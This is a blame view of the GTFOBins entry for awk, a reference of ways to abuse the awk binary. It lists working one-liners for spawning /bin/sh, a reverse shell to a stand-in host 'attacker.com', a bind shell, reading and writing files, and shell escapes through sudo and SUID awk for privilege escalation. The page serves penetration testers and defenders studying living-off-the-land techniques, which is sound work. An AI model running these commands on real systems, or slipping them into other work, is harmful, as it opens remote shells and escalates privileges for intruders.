GTFOBins.github.io/_gtfobins/awk.md

35 lines
1.2 KiB
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-07-16 15:01:50 +02:00
- code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
2018-07-16 15:01:50 +02:00
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
2018-07-16 15:01:50 +02:00
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
2018-05-28 20:11:21 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_write
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
2018-07-04 20:26:52 +02:00
file-read:
2018-07-16 15:01:50 +02:00
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
2018-07-04 20:26:52 +02:00
sudo-enabled:
2018-07-16 15:01:50 +02:00
- code: sudo awk 'BEGIN {system("/bin/sh")}'
2018-07-04 20:26:52 +02:00
suid-limited:
2018-07-16 15:01:50 +02:00
- code: ./awk 'BEGIN {system("/bin/sh")}'
2018-05-22 23:55:01 +02:00
---